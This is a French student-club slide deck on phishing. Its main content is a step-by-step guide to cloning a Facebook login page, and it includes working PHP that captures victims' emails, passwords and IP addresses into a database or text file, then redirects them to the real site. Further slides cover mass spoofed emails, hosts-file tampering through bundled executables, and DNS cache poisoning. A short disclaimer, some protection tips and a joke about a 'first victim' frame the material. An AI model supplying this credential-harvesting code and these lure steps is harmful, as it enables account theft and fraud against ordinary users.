Vous êtes sur la page 1sur 40

1

Le Club d’Informatique et du Logiciel Libre de l’Ecole


Polytechnique de Tunisie

Le Phishing
Elaboré par:
Mohamed Amine RHOUMA
Marwen ZORGUI

11/11/2011 2010
2
Illegal

3
LOL …

4
Disclaimer

Cette présentation est à titre éducatif, Il est


strictement illégal de l’appliquer à des fins
malhonnêtes.

5
PLAN

 C’est quoi le Phishing??


 Préparation nécessaire
 Piéger la victime
 Comment se protéger??

6
PLAN

 C’est quoi le Phishing??


 Préparation nécessaire
 Piéger la victime
 Comment se protéger??

7
Définition
• Concaténation de phreaking (piratage des
systèmes téléphoniques) et fishing (pêche)

• « Aller à la pèche aux informations »

• Connu aussi avec Hameçonnage et Filoutage

• Technique utilisée par les fraudeurs pour obtenir


des renseignements personnels

8
Principe de l’attaque

SITE FACTICE:
La victime croît être sur un site de confiance
pour saisir ses données personnelles, mais en
réalité il est en train de les envoyer au pirate
informatique

9
Principe

Accès à la page trompeuse

Saisie des informations confidentielles

Enregistrement des données par le criminel

10
Quelques statistiques…
• En 2007,le Phishing a rapporté 3.2 milliards de
dollars aux pirates

• Sites victimes de Phishing : tous les sites


contenant des données personnelles, surtout
bancaires (PayPal, Facebook, SNCF, CAF, …)

• 55.000 utilisateurs d'ordinateurs victimes


d'arnaques de Phishing tous les mois dans le
monde

11
PLAN

 C’est quoi le Phishing??


 Préparation nécessaire
 Piéger la victime
 Comment se protéger??

12
Préparation nécessaire

Création de la page trompeuse

Stockage des données

13
Création de la page trompeuse
Enregistrement de la page originale avec les
images et les autres fichiers (CSS : Cascading
Style Sheets, JavaScript…)

14
Création de la page trompeuse

• Modifier le code source de la page trompeuse


et plus précisément l’attribut ACTION de la
balise <FORM>

• Firebug : module complémentaire pour Firefox

15
Edition avec Firebug

16
Création de la page trompeuse
<form
method ="POST"
action="https://login.facebook.com/login.php?login_attempt=1">
<input name="email" value="Adresse électronique" type="text">
<input name="pass" type="password">
</form>

Devient:
<form
method="POST" action=“phishing.php" >
<input name="email" value="Adresse électronique" type="text">
<input name="pass" type="password">
</form>

17
Préparation nécessaire

• On peut utiliser WAMPserver qui permet à


notre machine de se comporter comme un
serveur

• Une autre alternative est d’héberger notre


page web sur la toile

18
Stockage des données

On dispose de plusieurs méthodes pour


récupérer les données :
• Utilisation d’une Base de Données
• Utilisation d’un fichier.txt
• Utilisation de la fonction mailto
• Etc.

19
Base de données: création

20
Base de Données: code PHP

<?php
mysql_connect("localhost","root","");
mysql_select_db("madrid");

$a=$_POST["email"];
$b=$_POST["pass"];
$c=$_SERVER["REMOTE_ADDR"];

$reponse=mysql_query("INSERT INTO tableau VALUES('','$a','$b','$c')") or


die(mysql_error());

Header("Location: http://www.facebook.com/");

?>

21
Fichier TXT
<?php
$fp = fopen("fichier.txt","a+");

fputs($fp,$_POST[email]);
fputs($fp," ");
fputs($fp,$_POST[pass]);
fputs($fp," ");
fputs($fp," ");
fputs($fp,$_SERVER["REMOTE_ADDR"]);
fputs($fp," ");

fclose($fp);

Header("Location:https://login.facebook.com/login.php?login_attempt=1");
?>

22
PLAN

 C’est quoi le Phishing??


 Préparation nécessaire
 Piéger la victime
 Comment se protéger??

23
24
Piéger la victime

Mail piège

Fichier hosts

DNS Cache poisoning

Etc.

25
Mail piège
Simple, rapide et efficace

• Créer une adresse mail imitant un tiers de


confiance(adresses jetables, faux mail…), par exemple
sami@boh.tn
• Reproduire le logo de la société dont on usurpe
l’identité.

• Trouver un prétexte pour que les victimes se rendent sur le


site factice, pour y entrer leurs infos personnelles.

• Envoyez le mail piégeur à autant de gens que possible.

26
Fichier hosts
• Dans le dossier :
C:\Windows\System32\drivers\etc

• Consultation de ce fichier avant l'accès au serveur


DNS

• Permet au système de connaitre l'adresse IP associée


au nom de domaine sans avoir recours à une requête
DNS

27
Fichier hosts

• Attaque par .rar dont l’extraction remplace le


fichier hosts

• Attaque par fichier .exe dont l’installation va


modifier le fichier hosts (Binder)

28
Binder : principe

VLC.exe virus.exe

VLC.exe(Piégeant)

29
Fichier hosts

Linux empêche toute sorte d’attaque

30
DNS Cache Poisoning
• Les serveurs DNS possèdent un cache permettant de
garder pendant un certain temps la correspondance
entre un nom de machine et son adresse IP

• Le DNS Cache Poisoning consiste à corrompre ce


cache avec de fausses informations

31
Bref

• Mail piége
• Fichier Hosts
• DNS Cache poisoning
• …

32
PLAN

 C’est quoi le Phishing??


 Préparation nécessaire
 Piéger la victime
 Comment se protéger??

33
Comment se protéger??

• Assurez-vous, lorsque vous saisissez des informations


sensibles, que le navigateur est en mode sécurisé
(https)

34
Comment se protéger??

• S’assurer que le domaine du site dans l'adresse


correspond bien à celui annoncé (Attention à
l'orthographe du domaine)
• Se méfier des sites web de type
http://41.229.1.181/facebook
• Vérifier les liens dans les mails même s’ils
proviennent d’une source de confiance

35
Comment se protéger??
• Il faut être particulièrement vigilant lorsque
l'on rencontre une adresse Web contenant le
symbole « @ »
Par exemple l'adresse
http://www.facebook.com@41.229.0.170/
mène à 41.229.0.170 et non pas à
www.facebook.com comme on pourrait le
croire

36
Comment se protéger??
• Ne Télécharger les programmes que depuis
des sites officiels
• Utiliser un antivirus

37
Surprise!!

Notre première victime a été ….

38
39
Merci pour votre
attention !!
40